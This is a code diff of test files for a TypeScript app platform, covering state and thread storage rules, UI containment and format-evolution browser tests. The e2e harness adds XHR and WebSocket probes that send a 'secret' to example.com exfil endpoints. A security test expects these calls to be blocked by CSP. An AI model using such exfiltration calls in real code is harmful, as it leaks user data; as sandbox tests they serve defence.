+      // Overwrite through the seam; row shape (id/app_id/subject) is identical.
+      await made.store.records("vendo_state").put({ id: `app_doors:${persistentPrincipal.subject}`, data: { same: true } });
+      const seamRow = (await made.sql(
+        "SELECT id, app_id, subject, data FROM vendo_state WHERE id = $1",
+        [`app_doors:${persistentPrincipal.subject}`],
+      ))[0];
+      expect(seamRow).toEqual(helperRow);
+    });
+
+    it("does not skip an unvisited row when a later row is updated mid-sweep (cursor on created_at)", async () => {
+      const state = made.store.records("vendo_state");
+      // Three rows created oldest->newest so the newest pages first.
+      for (const suffix of ["a", "b", "c"]) {
+        await made.sql(
+          `INSERT INTO vendo_state (app_id, subject, data, updated_at, created_at)
+           VALUES ($1, $2, $3::jsonb, $4, $4)`,
+          [`app_sweep_${suffix}`, "user_sweep", JSON.stringify({ s: suffix }), `2026-05-0${suffix === "a" ? 1 : suffix === "b" ? 2 : 3}T00:00:00.000Z`],
+        );
+      }
+      // Page size 1: read the newest (c). Then TOUCH c (updated_at jumps to now).
+      const page1 = await state.list({ refs: { subject: "user_sweep" }, limit: 1 });
+      expect(page1.records.map((r) => r.id)).toEqual(["app_sweep_c:user_sweep"]);
+      await state.put({ id: "app_sweep_c:user_sweep", data: { touched: true } });
+      // Continue the sweep. Because we page on the STABLE created_at, b and a are
+      // still reachable — an updated_at cursor would have skipped past them.
+      const seen = [...page1.records.map((r) => r.id)];
+      let cursor = page1.cursor;
+      while (cursor !== undefined) {
+        const next = await state.list({ refs: { subject: "user_sweep" }, limit: 1, cursor });
+        seen.push(...next.records.map((r) => r.id));
+        cursor = next.cursor;
+      }
+      expect(seen).toEqual([
+        "app_sweep_c:user_sweep",
+        "app_sweep_b:user_sweep",
+        "app_sweep_a:user_sweep",
+      ]);
+    });
+
+    it("routes id 'app_a:b:c' as appId app_a / subject b:c (first colon splits)", async () => {
+      await made.store.records("vendo_state").put({ id: "app_a:b:c", data: { ok: 1 } });
+      expect(await made.sql(
+        "SELECT app_id, subject FROM vendo_state WHERE app_id = 'app_a'",
+      )).toEqual([{ app_id: "app_a", subject: "b:c" }]);
+    });
+
+    it("rejects a state id whose first segment is not a colon-free app id (C1)", async () => {
+      // Without the shape check, '<appId>:<subject>' is not uniquely decodable and
+      // a doctored id could collide with another row (e.g. (app_x:y, z) vs
+      // (app_x, y:z)). The write door refuses any non-app_ leading segment, so no
+      // doctored id can ever target a row it does not own.
+      await expect(made.store.records("vendo_state").put({ id: "notanapp:user", data: {} }))
+        .rejects.toMatchObject<VendoError>({ code: "validation" });
+      await expect(made.store.records("vendo_state").delete("notanapp:user"))
+        .rejects.toMatchObject<VendoError>({ code: "validation" });
+      // Nothing was written under the doctored id.
+      expect(Number((await made.sql(
+        "SELECT COUNT(*)::int AS count FROM vendo_state WHERE subject = 'user'",
+      ))[0]?.["count"])).toBe(0);
+    });
+  });
+}
+
+for (const backend of backends()) {
   describe(`${backend.name} vendo_state ephemeral routing`, () => {
     let made: MadeBackend;
     const ephemeral: Principal = { kind: "user", subject: "sess_state", ephemeral: true };
@@ -147,6 +240,25 @@ for (const backend of backends()) {
       await made.store.ensureSchema();
       expect(await made.store.records("vendo_state").get("app_ghost:sess_state")).toBeNull();
     });
+
+    it("registers the subject on stateStore.put so a later seam write cannot leak to disk (B2)", async () => {
+      // The split-brain / disk-leak case: an ephemeral principal's FIRST write goes
+      // through stateStore.put (not appStore.put), then the apps runtime writes the
+      // same subject through the records seam. Both must stay in the overlay — zero
+      // disk rows (02 §4: ephemeral principals never touch disk).
+      const solo: Principal = { kind: "user", subject: "sess_b2", ephemeral: true };
+      await stateStore(made.store).put(solo, "app_b2", { first: "helper" });
+      // The seam write for the same subject now correctly sees it as ephemeral.
+      await made.store.records("vendo_state").put({ id: "app_b2:sess_b2", data: { second: "seam" } });
+
+      expect(Number((await made.sql(
+        "SELECT COUNT(*)::int AS count FROM vendo_state WHERE subject = 'sess_b2'",
+      ))[0]?.["count"])).toBe(0);
+      // Both doors read the SAME overlay value (no split-brain).
+      expect(await stateStore(made.store).get(solo, "app_b2")).toEqual({ second: "seam" });
+      expect((await made.store.records("vendo_state").get("app_b2:sess_b2"))?.data)
+        .toEqual({ second: "seam" });
+    });
   });
 }
 
@@ -159,16 +271,26 @@ for (const backend of backends()) {
     });
     afterAll(async () => { if (made) await made.cleanup(); });
 
-    it("relocates legacy vendo_records state rows into the dedicated table", async () => {
+    // Force the store back to a pre-v2 recorded version so the NEXT ensureSchema
+    // runs the version-gated backfill exactly once (02 §4: forward-only).
+    const downgradeToV1 = async (): Promise<void> => {
+      await made.sql("UPDATE vendo_meta SET value = '1'::jsonb WHERE key = 'schema_version'");
+      await made.store.close();
+      made.store = createStore({ url: made.url, dataDir: made.dataDir });
+    };
+
+    it("relocates colon-id legacy rows once, records v2, and never re-runs", async () => {
       // Simulate a pre-fix deployment: state written the old way into vendo_records.
       await made.sql(
         `INSERT INTO vendo_records (collection, id, data, refs, created_at, updated_at)
          VALUES ('vendo_state', $1, $2::jsonb, $3::jsonb, $4, $4)`,
         ["app_legacy:user_old", JSON.stringify({ legacy: true }), JSON.stringify({ app_id: "app_legacy", subject: "user_old" }), "2026-01-02T03:04:05.000Z"],
       );
+      await downgradeToV1();
 
-      // Re-running ensureSchema performs the idempotent backfill.
+      // The v1 -> v2 upgrade performs the backfill.
       await made.store.ensureSchema();
+      expect((await made.sql("SELECT value FROM vendo_meta WHERE key = 'schema_version'"))[0]?.value).toBe(2);
 
       expect(await made.sql(
         "SELECT app_id, subject, data FROM vendo_state WHERE app_id = 'app_legacy'",
@@ -176,15 +298,77 @@ for (const backend of backends()) {
       expect(Number((await made.sql(
         "SELECT COUNT(*)::int AS count FROM vendo_records WHERE collection = 'vendo_state'",
       ))[0]?.["count"])).toBe(0);
+      // created_at is backfilled (from updated_at), so the seam exposes a real one.
+      expect((await made.sql(
+        "SELECT created_at FROM vendo_state WHERE app_id = 'app_legacy'",
+      ))[0]?.["created_at"]).toBeDefined();
       // Visible through the seam its owner reads from.
       expect((await made.store.records("vendo_state").get("app_legacy:user_old"))?.data)
         .toEqual({ legacy: true });
 
-      // Idempotent: a second run is a no-op.
+      // Already on v2: a second run does not re-run the backfill.
       await made.store.ensureSchema();
       expect(Number((await made.sql(
         "SELECT COUNT(*)::int AS count FROM vendo_state WHERE app_id = 'app_legacy'",
       ))[0]?.["count"])).toBe(1);
+    });
+
+    it("preserves colon-less collection='vendo_state' rows — they are NOT destroyed", async () => {
+      // A different legacy shape (no colon in id) must survive: the scoped DELETE
+      // only removes rows the INSERT actually relocated (B3).
+      await made.sql(
+        `INSERT INTO vendo_records (collection, id, data, refs, created_at, updated_at)
+         VALUES ('vendo_state', $1, $2::jsonb, NULL, $3, $3)`,
+        ["colonless_legacy", JSON.stringify({ keep: true }), "2026-01-02T03:04:05.000Z"],
+      );
+      await downgradeToV1();
+      await made.store.ensureSchema();
+
+      expect(await made.sql(
+        "SELECT id, data FROM vendo_records WHERE collection = 'vendo_state' AND id = 'colonless_legacy'",
+      )).toEqual([{ id: "colonless_legacy", data: { keep: true } }]);
+      // ...and it was NOT misrouted into the dedicated table.
+      expect(Number((await made.sql(
+        "SELECT COUNT(*)::int AS count FROM vendo_state WHERE app_id = 'colonless_legacy'",
+      ))[0]?.["count"])).toBe(0);
+    });
+
+    it("resolves a newer legacy row over an older dedicated row by timestamp (C2)", async () => {
+      // Both write doors were live pre-fix; a legacy vendo_records row can be NEWER
+      // than an existing dedicated row. The newer write must win, not DO NOTHING.
+      await made.sql(
+        `INSERT INTO vendo_state (app_id, subject, data, updated_at, created_at)
+         VALUES ('app_c2', 'user_c2', $1::jsonb, $2, $2)`,
+        [JSON.stringify({ from: "dedicated-stale" }), "2026-02-01T00:00:00.000Z"],
+      );
+      await made.sql(
+        `INSERT INTO vendo_records (collection, id, data, refs, created_at, updated_at)
+         VALUES ('vendo_state', 'app_c2:user_c2', $1::jsonb, NULL, $2, $2)`,
+        [JSON.stringify({ from: "records-newer" }), "2026-03-01T00:00:00.000Z"],
+      );
+      await downgradeToV1();
+      await made.store.ensureSchema();
+      expect((await made.sql(
+        "SELECT data FROM vendo_state WHERE app_id = 'app_c2'",
+      ))[0]?.["data"]).toEqual({ from: "records-newer" });
+    });
+
+    it("keeps an older legacy row from clobbering a newer dedicated row (C2)", async () => {
+      await made.sql(
+        `INSERT INTO vendo_state (app_id, subject, data, updated_at, created_at)
+         VALUES ('app_c2b', 'user_c2b', $1::jsonb, $2, $2)`,
+        [JSON.stringify({ from: "dedicated-newer" }), "2026-04-01T00:00:00.000Z"],
+      );
+      await made.sql(
+        `INSERT INTO vendo_records (collection, id, data, refs, created_at, updated_at)
+         VALUES ('vendo_state', 'app_c2b:user_c2b', $1::jsonb, NULL, $2, $2)`,
+        [JSON.stringify({ from: "records-stale" }), "2026-01-01T00:00:00.000Z"],
+      );
+      await downgradeToV1();
+      await made.store.ensureSchema();
+      expect((await made.sql(
+        "SELECT data FROM vendo_state WHERE app_id = 'app_c2b'",
+      ))[0]?.["data"]).toEqual({ from: "dedicated-newer" });
     });
   });
 }

--- a/packages/store/src/thread-scoping.test.ts
+++ b/packages/store/src/thread-scoping.test.ts
@@ -1,0 +1,71 @@
+/** B1 — vendo_threads never lets one subject take over another's thread row.
+ *
+ * vendo_threads is keyed by the bare id, so a naive upsert would let any caller
+ * flip the row's subject. The store refuses the cross-subject flip ATOMICALLY at
+ * the write door (03 §5): the guarded SQL upsert on the persistent path, and a
+ * prior-owner check on the ephemeral overlay path. Same-subject re-puts still
+ * update in place.
+ */
+import { VendoError, type Principal } from "@vendoai/core";
+import { afterAll, beforeAll, describe, expect, it } from "vitest";
+import { backends, type MadeBackend } from "./backends.test-util.js";
+import { registerEphemeralSubject, threadStore } from "./index.js";
+
+const u1: Principal = { kind: "user", subject: "user_one" };
+const u2: Principal = { kind: "user", subject: "user_two" };
+
+for (const backend of backends()) {
+  describe(`${backend.name} vendo_threads cross-subject refusal (B1)`, () => {
+    let made: MadeBackend;
+    beforeAll(async () => {
+      made = await backend.make();
+      await made.store.ensureSchema();
+    });
+    afterAll(async () => { if (made) await made.cleanup(); });
+
+    it("refuses a cross-subject flip on the persistent SQL path, row intact", async () => {
+      const threads = threadStore(made.store);
+      await threads.put(u1, { id: "thr_sql", messages: [{ role: "user", text: "mine" }] });
+
+      // u2 trying to write the same id is a conflict — the guarded upsert's WHERE
+      // fails, RETURNING is empty, and nothing is written.
+      await expect(threads.put(u2, { id: "thr_sql", messages: [{ role: "user", text: "steal" }] }))
+        .rejects.toMatchObject<VendoError>({ code: "conflict" });
+
+      // u1's row is byte-for-byte intact.
+      expect(await made.sql("SELECT id, subject, messages FROM vendo_threads WHERE id = 'thr_sql'"))
+        .toEqual([{ id: "thr_sql", subject: "user_one", messages: [{ role: "user", text: "mine" }] }]);
+
+      // Same-subject re-put still updates in place.
+      await threads.put(u1, { id: "thr_sql", messages: [{ role: "user", text: "updated" }] });
+      expect((await made.sql("SELECT messages FROM vendo_threads WHERE id = 'thr_sql'"))[0]?.["messages"])
+        .toEqual([{ role: "user", text: "updated" }]);
+    });
+
+    it("refuses a cross-subject flip on the routed seam (records vendo_threads)", async () => {
+      const seam = made.store.records("vendo_threads");
+      await seam.put({ id: "thr_seam", data: { subject: u1.subject, messages: [{ role: "user", text: "mine" }] } });
+      await expect(seam.put({ id: "thr_seam", data: { subject: u2.subject, messages: [] } }))
+        .rejects.toMatchObject<VendoError>({ code: "conflict" });
+      expect(await made.sql("SELECT subject FROM vendo_threads WHERE id = 'thr_seam'"))
+        .toEqual([{ subject: "user_one" }]);
+    });
+
+    it("refuses a cross-subject flip on the ephemeral overlay path", async () => {
+      const e1: Principal = { kind: "user", subject: "sess_one", ephemeral: true };
+      const e2: Principal = { kind: "user", subject: "sess_two", ephemeral: true };
+      registerEphemeralSubject(made.store, e1.subject);
+      registerEphemeralSubject(made.store, e2.subject);
+      const threads = threadStore(made.store);
+      await threads.put(e1, { id: "thr_overlay", messages: [{ role: "user", text: "mine" }] });
+      await expect(threads.put(e2, { id: "thr_overlay", messages: [] }))
+        .rejects.toMatchObject<VendoError>({ code: "conflict" });
+      // Nothing hit disk for the ephemeral thread, and e1 still owns the overlay row.
+      expect(Number((await made.sql(
+        "SELECT COUNT(*)::int AS count FROM vendo_threads WHERE id = 'thr_overlay'",
+      ))[0]?.["count"])).toBe(0);
+      expect((await threads.get(e1, "thr_overlay"))?.subject).toBe("sess_one");
+      expect(await threads.get(e2, "thr_overlay")).toBeNull();
+    });
+  });
+}

--- a/packages/ui/e2e/accessibility.spec.ts
+++ b/packages/ui/e2e/accessibility.spec.ts
@@ -12,6 +12,7 @@ const chromeScenarios = [
   "automations",
   "notice",
   "stage",
+  "slot",
 ] as const;
 
 for (const scenario of chromeScenarios) {
@@ -25,6 +26,7 @@ for (const scenario of chromeScenarios) {
     if (scenario === "automations") await expect(page.getByRole("switch")).toBeVisible();
     if (scenario === "notice") await expect(page.getByRole("region", { name: "Vendo is running without a policy" })).toBeVisible();
     if (scenario === "stage") await expect(page.getByText("Revenue is ready")).toBeVisible();
+    if (scenario === "slot") await expect(page.getByText("Invoices app surface")).toBeVisible();
 
     const results = await new AxeBuilder({ page })
       .withTags(["wcag2a", "wcag2aa", "wcag21a", "wcag21aa"])

--- a/packages/ui/e2e/containment.spec.ts
+++ b/packages/ui/e2e/containment.spec.ts
@@ -1,0 +1,58 @@
+import { expect, test } from "@playwright/test";
+import { openScenario } from "./helpers.js";
+
+/**
+ * 01-core §8; 08-ui §5 — the containment quartet, proven in a real browser.
+ * jail-and-tree.spec covers (a) an erroring node → contained placeholder and the
+ * initial skeleton of (b) dangling children. These are the remaining three:
+ * (b) the skeleton later swaps in, (c) an unknown formatVersion contains, and
+ * (d) a throwing pin falls back to the original host component.
+ */
+
+test("dangling child skeleton swaps in when the streamed node arrives", async ({ page }) => {
+  const pageErrors: string[] = [];
+  page.on("pageerror", error => pageErrors.push(error.message));
+  await openScenario(page, "tree-stream");
+
+  // Before completion: the missing child renders a streaming skeleton.
+  await expect(page.locator('[data-dangling-node="late"] [data-primitive="Skeleton"]')).toBeVisible();
+  await expect(page.getByText("Streamed node arrived")).toBeHidden();
+
+  // After completion: the real node swaps in and the skeleton is gone.
+  await expect(page.getByText("Streamed node arrived")).toBeVisible();
+  await expect(page.locator('[data-dangling-node="late"]')).toHaveCount(0);
+  expect(pageErrors, "streaming completion must not surface uncaught errors").toEqual([]);
+});
+
+test("an unknown formatVersion contains to a notice, direct and in a thread", async ({ page }) => {
+  const pageErrors: string[] = [];
+  page.on("pageerror", error => pageErrors.push(error.message));
+  await openScenario(page, "unknown-format");
+
+  // Direct: the renderer dispatches by tag and finds no match → contained notice.
+  const direct = page.locator('section[aria-label="Unknown format direct"]');
+  await expect(direct.getByRole("note", { name: "Unsupported UI format" })).toContainText("vendo-genui/v999");
+  await expect(direct.getByText("Host content after the direct unknown surface survived.")).toBeVisible();
+
+  // In-thread: a VendoViewPart with an unknown payload contains without breaking
+  // the surrounding conversation — the trailing message still renders.
+  const thread = page.locator('section[aria-label="Unknown format in thread"]');
+  await expect(thread.getByRole("note", { name: "Unsupported UI format" })).toContainText("vendo-genui/v999");
+  await expect(thread.getByText("The conversation keeps going past the unknown surface.")).toBeVisible();
+
+  expect(pageErrors, "an unknown format is a contained failure, never an uncaught error").toEqual([]);
+});
+
+test("a throwing pin mount falls back to the original host component", async ({ page }) => {
+  const pageErrors: string[] = [];
+  page.on("pageerror", error => pageErrors.push(error.message));
+  await openScenario(page, "slot-fallback");
+
+  // The app open() throws; the pin error boundary shows the original children.
+  await expect(page.getByRole("heading", { name: "Original host hero" })).toBeVisible();
+  await expect(page.getByText("Host fallback stayed on screen.")).toBeVisible();
+
+  // Only the deliberately-thrown pin error may reach the page error channel.
+  const unexpected = pageErrors.filter(message => !message.includes("pin mount exploded during render"));
+  expect(unexpected, "the pin failure must not escape its boundary").toEqual([]);
+});

--- a/packages/ui/e2e/exfil-probe.spec.ts
+++ b/packages/ui/e2e/exfil-probe.spec.ts
@@ -22,6 +22,11 @@ test("no exfiltration channel out of the jail: navigation, beacon, image", async
   const jail = jailFrame(page, "SecurityProbe");
   await expect(jail.getByRole("heading", { name: "Rendered generated props" })).toBeVisible();
 
+  // Every network-capable API a generated component could reach for, one by one.
+  await jail.getByRole("button", { name: "Probe xhr" }).click();
+  await expect(jail.locator("#xhr-status")).toHaveText("xhr: FAILURE (CSP)");
+  await jail.getByRole("button", { name: "Probe socket" }).click();
+  await expect(jail.locator("#socket-status")).toHaveText("socket: FAILURE (CSP)");
   await jail.getByRole("button", { name: "Probe beacon" }).click();
   await jail.getByRole("button", { name: "Probe image" }).click();
   await expect(jail.locator("#image-status")).toHaveText("image: FAILURE (CSP)");

--- a/packages/ui/e2e/format-drill.spec.ts
+++ b/packages/ui/e2e/format-drill.spec.ts
@@ -1,0 +1,68 @@
+import { expect, test } from "@playwright/test";
+import { openScenario } from "./helpers.js";
+
+/**
+ * FORMAT-EVOLUTION FIRE DRILL — the UI renderer-registry seam proven in a REAL
+ * browser (08-ui §5; 01-core §8). A throwaway second UI format `vendo/tree@2-drill`
+ * is registered ONLY in the test harness, never in product source. The three
+ * proofs the evolution story requires:
+ *   (a) a registered drill renderer renders the drill payload;
+ *   (b) an unregistered drill tag contains to a notice — the page never breaks,
+ *       and a v1 tree elsewhere on the page is unaffected;
+ *   (c) a stored v0 tree renders identically whether or not the drill is
+ *       registered ("a runtime keeps rendering every format it ever registered").
+ */
+
+const DRILL_FORMAT = "vendo/tree@2-drill";
+
+test("(a) a registered drill renderer renders the drill payload", async ({ page }) => {
+  const pageErrors: string[] = [];
+  page.on("pageerror", error => pageErrors.push(error.message));
+  await openScenario(page, "format-drill-registered");
+
+  const drill = page.locator('section[aria-label="Drill payload"]');
+  await expect(drill.getByRole("region", { name: "Drill format surface" })).toBeVisible();
+  await expect(drill.getByText("Quarterly revenue")).toBeVisible();
+  await expect(drill.getByText("$4,200 across 3 invoices")).toBeVisible();
+  // The registered renderer means NO fallback notice.
+  await expect(drill.getByRole("note", { name: "Unsupported UI format" })).toHaveCount(0);
+
+  expect(pageErrors, "a registered format must render without uncaught errors").toEqual([]);
+});
+
+test("(b) an unregistered drill tag contains to a notice; the v1 tree beside it is unaffected", async ({ page }) => {
+  const pageErrors: string[] = [];
+  page.on("pageerror", error => pageErrors.push(error.message));
+  await openScenario(page, "format-drill-unregistered");
+
+  // The drill surface with no renderer registered → contained notice naming the tag.
+  const drill = page.locator('section[aria-label="Drill payload"]');
+  await expect(drill.getByRole("note", { name: "Unsupported UI format" })).toContainText(DRILL_FORMAT);
+  await expect(drill.getByRole("region", { name: "Drill format surface" })).toHaveCount(0);
+
+  // The v1 tree on the SAME page rendered normally — the contained failure did
+  // not leak past its own surface.
+  const stored = page.locator('section[aria-label="Stored v0 tree"]');
+  await expect(stored.getByText("Stored v0 invoice")).toBeVisible();
+  await expect(stored.getByText("4200")).toBeVisible();
+
+  await expect(page.getByText("Host content after the drill surfaces survived.")).toBeVisible();
+  expect(pageErrors, "an unregistered format is a contained failure, never an uncaught error").toEqual([]);
+});
+
+test("(c) the stored v0 tree renders identically with and without the drill registered", async ({ page }) => {
+  const readStored = async (scenario: string): Promise<string> => {
+    await openScenario(page, scenario);
+    const stored = page.locator('section[aria-label="Stored v0 tree"]');
+    await expect(stored.getByText("Stored v0 invoice")).toBeVisible();
+    // Normalize the rendered surface to compare structure + text across pages.
+    return (await stored.locator('[data-vendo-node-id="root"]').innerHTML()).trim();
+  };
+
+  const withDrill = await readStored("format-drill-registered");
+  const withoutDrill = await readStored("format-drill-unregistered");
+  expect(withDrill, "a stored v0 record renders identically regardless of newer registered formats")
+    .toBe(withoutDrill);
+  expect(withDrill).toContain("Stored v0 invoice");
+  expect(withDrill).toContain("4200");
+});

--- a/packages/ui/e2e/harness/main.tsx
+++ b/packages/ui/e2e/harness/main.tsx
@@ -4,6 +4,7 @@ import type {
   Json,
   ToolOutcome,
   Tree,
+  UIPayload,
   VendoTheme,
 } from "@vendoai/core";
 import {
@@ -11,6 +12,7 @@ import {
   createVendoClient,
   themeCssVariables,
   useVendoTheme,
+  type OpenSurface,
   type Thread,
   type VendoClient,
 } from "../../src/index.js";
@@ -22,11 +24,12 @@ import {
   VendoOverlay,
   VendoPage,
   VendoPalette,
+  VendoSlot,
   VendoStage,
   VendoThread,
   type VendoCommand,
 } from "../../src/chrome/index.js";
-import { AppFrame, TreeView } from "../../src/tree/index.js";
+import { AppFrame, PayloadView, TreeView, registerTreeRenderer, type PayloadRendererProps } from "../../src/tree/index.js";
 import {
   realtimeVoiceDriver,
   type VoiceDriver,
@@ -136,13 +139,52 @@ const pendingThread: Thread = {
   }],
 };
 
-function threadClient(client: VendoClient): VendoClient {
+/** An in-thread app surface (VendoViewPart) whose payload carries a format no
+ *  renderer is registered for — it must contain to a notice, never break the thread. */
+const unknownViewThread: Thread = {
+  id: "thr_unknown",
+  subject: "browser-user",
+  createdAt: NOW,
+  updatedAt: NOW,
+  messages: [{
+    id: "msg_unknown_view",
+    role: "assistant",
+    parts: [
+      { type: "text", text: "Here is the surface from a newer runtime." },
+      {
+        type: "data-vendo-view",
+        data: {
+          appId: "app_future",
+          payload: { formatVersion: "vendo-genui/v999", root: "root", nodes: [] },
+        },
+      },
+      { type: "text", text: "The conversation keeps going past the unknown surface." },
+    ],
+  }],
+};
+
+function threadClient(client: VendoClient, thread: Thread): VendoClient {
   return {
     ...client,
     threads: {
       ...client.threads,
-      get: async id => id === pendingThread.id ? pendingThread : client.threads.get(id),
+      get: async id => id === thread.id ? thread : client.threads.get(id),
     },
+  };
+}
+
+/** A client whose opened surface throws when the pin mount renders it — proves
+ *  the VendoSlot pin boundary falls back to the original host component
+ *  (06-apps §8; 08-ui §5). The throw must happen at RENDER time (the boundary
+ *  only catches render errors), so the surface's `kind` getter explodes. */
+function throwingOpenClient(client: VendoClient): VendoClient {
+  const broken = {} as OpenSurface;
+  Object.defineProperty(broken, "kind", {
+    get() { throw new Error("pin mount exploded during render"); },
+  });
+  return {
+    ...client,
+    apps: { ...client.apps, open: async () => broken },
   };
 }
 
@@ -189,6 +231,8 @@ import React, { useState } from "react";
 
 export default function SecurityProbe({ label, onRun }) {
   const [fetchStatus, setFetchStatus] = useState("not run");
+  const [xhrStatus, setXhrStatus] = useState("not run");
+  const [socketStatus, setSocketStatus] = useState("not run");
   const [importStatus, setImportStatus] = useState("not run");
   const [parentStatus, setParentStatus] = useState("not run");
   const [actionStatus, setActionStatus] = useState("not run");
@@ -202,6 +246,30 @@ export default function SecurityProbe({ label, onRun }) {
       setFetchStatus("UNEXPECTED SUCCESS");
     } catch {
       setFetchStatus("FAILURE (CSP)");
+    }
+  }
+
+  // XHR is a distinct API from fetch but the same connect-src directive governs it.
+  function probeXhr() {
+    try {
+      const xhr = new XMLHttpRequest();
+      xhr.open("GET", "https://example.com/xhr-exfil?secret=" + encodeURIComponent(label));
+      xhr.onload = () => setXhrStatus("UNEXPECTED SUCCESS");
+      xhr.onerror = () => setXhrStatus("FAILURE (CSP)");
+      xhr.send();
+    } catch {
+      setXhrStatus("FAILURE (CSP)");
+    }
+  }
+
+  // WebSocket construction is blocked outright by connect-src 'none' (throws).
+  function probeSocket() {
+    try {
+      const socket = new WebSocket("wss://example.com/socket-exfil");
+      socket.onopen = () => setSocketStatus("UNEXPECTED SUCCESS");
+      socket.onerror = () => setSocketStatus("FAILURE (CSP)");
+    } catch {
+      setSocketStatus("FAILURE (CSP)");
     }
   }
 
@@ -259,6 +327,10 @@ export default function SecurityProbe({ label, onRun }) {
     <h2>{label}</h2>
     <button type="button" onClick={probeFetch}>Probe fetch</button>
     <output id="fetch-status">fetch: {fetchStatus}</output>
+    <button type="button" onClick={probeXhr}>Probe xhr</button>
+    <output id="xhr-status">xhr: {xhrStatus}</output>
+    <button type="button" onClick={probeSocket}>Probe socket</button>
+    <output id="socket-status">socket: {socketStatus}</output>
     <button type="button" onClick={probeImport}>Probe import</button>
     <output id="import-status">import: {importStatus}</output>
     <button type="button" onClick={probeParent}>Probe parent DOM</button>
@@ -406,6 +478,133 @@ function AppFrameScenario() {
 
 const baseClient = createVendoClient({ baseUrl: "/api/vendo" });
 
+/** Containment (c): an unregistered formatVersion must render a contained notice
+ *  both when handed straight to the renderer AND when it arrives in a thread. */
+function UnknownFormatScenario() {
+  const noop = async (): Promise<ToolOutcome> => ({ status: "ok", output: null });
+  return (
+    <div className="unknown-format-grid">
+      <section aria-label="Unknown format direct">
+        <h2>Direct renderer</h2>
+        <PayloadView
+          payload={{ formatVersion: "vendo-genui/v999", root: "root", nodes: [] }}
+          components={components}
+          onAction={noop}
+        />
+        <p>Host content after the direct unknown surface survived.</p>
+      </section>
+      <section aria-label="Unknown format in thread">
+        <h2>In a thread</h2>
+        <VendoProvider client={threadClient(baseClient, unknownViewThread)} components={components}>
+          <VendoThread threadId="thr_unknown" />
+        </VendoProvider>
+      </section>
+    </div>
+  );
+}
+
+/** Containment (b): a dangling child renders a skeleton; when the streamed node
+ *  later arrives, the skeleton swaps in for the real content. */
+function StreamCompletionScenario() {
+  const [complete, setComplete] = useState(false);
+  useEffect(() => {
+    const timer = globalThis.setTimeout(() => setComplete(true), 250);
+    return () => globalThis.clearTimeout(timer);
+  }, []);
+  const noop = async (): Promise<ToolOutcome> => ({ status: "ok", output: null });
+  const streamingTree: Tree = {
+    formatVersion: "vendo-genui/v1",
+    root: "root",
+    nodes: [
+      { id: "root", component: "Stack", children: ["late"] },
+      ...(complete ? [{ id: "late", component: "Text", props: { text: "Streamed node arrived" } }] : []),
+    ],
+  };
+  return (
+    <div data-stream-complete={complete}>
+      <TreeView tree={streamingTree} components={components} onAction={noop} />
+    </div>
+  );
+}
+
+/** Containment (d): a pin/app that throws on mount → the VendoSlot error boundary
+ *  falls back to the ORIGINAL host component (the children). */
+function SlotFallbackScenario() {
+  return (
+    <VendoProvider client={throwingOpenClient(baseClient)} components={components}>
+      <VendoSlot id="hero" appId="app_1">
+        <section aria-label="Original host component"><h2>Original host hero</h2><p>Host fallback stayed on screen.</p></section>
+      </VendoSlot>
+    </VendoProvider>
+  );
+}
+
+/**
+ * FORMAT-EVOLUTION FIRE DRILL (08-ui §5; 01-core §8). A throwaway second UI
+ * format, registered ONLY in this test harness — never in product source. It
+ * proves the renderer registry's evolution seam opens in a real browser: a
+ * registered drill renderer renders; an unregistered drill tag contains to a
+ * notice while v1 trees on the same page keep rendering; and a stored v0 tree
+ * renders identically whether or not the drill format is registered.
+ */
+const DRILL_FORMAT = "vendo/tree@2-drill";
+
+interface DrillBlock { heading: string; body: string }
+
+const drillPayload = {
+  formatVersion: DRILL_FORMAT,
+  // Deliberately non-tree-shaped (no root/nodes): a future format owns its body.
+  blocks: [
+    { heading: "Quarterly revenue", body: "$4,200 across 3 invoices" },
+    { heading: "Next step", body: "Send the reminder" },
+  ] satisfies DrillBlock[],
+};
+
+/** A throwaway renderer for the drill format's block-list shape. */
+function DrillRenderer({ payload }: PayloadRendererProps) {
+  const blocks = (payload as { blocks?: DrillBlock[] }).blocks ?? [];
+  return (
+    <section aria-label="Drill format surface">
+      {blocks.map((block, index) => (
+        <article key={index}><h3>{block.heading}</h3><p>{block.body}</p></article>
+      ))}
+    </section>
+  );
+}
+
+/** A stable v0 tree used as the "stored old-format record" across both drill
+ *  scenarios — its rendering must be byte-for-byte the same registered or not. */
+const storedV1Tree: Tree = {
+  formatVersion: "vendo-genui/v1",
+  root: "root",
+  data: { invoice: { total: 4200 } },
+  nodes: [
+    { id: "root", component: "Stack", props: { gap: 8 }, children: ["heading", "amount"] },
+    { id: "heading", component: "Text", props: { text: "Stored v0 invoice", variant: "heading" } },
+    { id: "amount", component: "Text", props: { text: { $path: "/invoice/total" } } },
+  ],
+};
+
+function FormatDrillScenario({ registered }: { registered: boolean }) {
+  const noop = async (): Promise<ToolOutcome> => ({ status: "ok", output: null });
+  // Registration is a real-browser side effect on the module-level registry;
+  // each page load is a fresh module, so `registered` fully controls the seam.
+  if (registered) registerTreeRenderer(DRILL_FORMAT, DrillRenderer);
+  return (
+    <div className="format-drill-grid">
+      <section aria-label="Drill payload">
+        <h2>Drill format payload</h2>
+        <PayloadView payload={drillPayload} components={components} onAction={noop} />
+      </section>
+      <section aria-label="Stored v0 tree">
+        <h2>Stored v0 record</h2>
+        <PayloadView payload={storedV1Tree as unknown as UIPayload} components={components} onAction={noop} />
+      </section>
+      <p>Host content after the drill surfaces survived.</p>
+    </div>
+  );
+}
+
 function scenario(pathname: string): { title: string; theme?: Partial<VendoTheme>; content: ReactNode; ownProvider?: boolean } {
   switch (pathname) {
     case "/thread": return { title: "Thread — dark theme", theme: darkTheme, content: <VendoThread threadId="thr_1" /> };
@@ -421,6 +620,12 @@ function scenario(pathname: string): { title: string; theme?: Partial<VendoTheme
     case "/tree": return { title: "Tree containment", content: <TreeScenario /> };
     case "/tree-jail": return { title: "Generated component jail", content: <TreeScenario jail /> };
     case "/tree-themed": return { title: "Tree — loud host theme", theme: loudTheme, content: <TreeScenario /> };
+    case "/tree-stream": return { title: "Streaming completion", content: <StreamCompletionScenario /> };
+    case "/unknown-format": return { title: "Unknown UI format", content: <UnknownFormatScenario />, ownProvider: true };
+    case "/format-drill-registered": return { title: "Format drill — registered", content: <FormatDrillScenario registered />, ownProvider: true };
+    case "/format-drill-unregistered": return { title: "Format drill — unregistered", content: <FormatDrillScenario registered={false} />, ownProvider: true };
+    case "/slot": return { title: "Inline app slot", content: <VendoSlot id="hero" appId="app_1"><section aria-label="Original host component"><h2>Original host hero</h2></section></VendoSlot> };
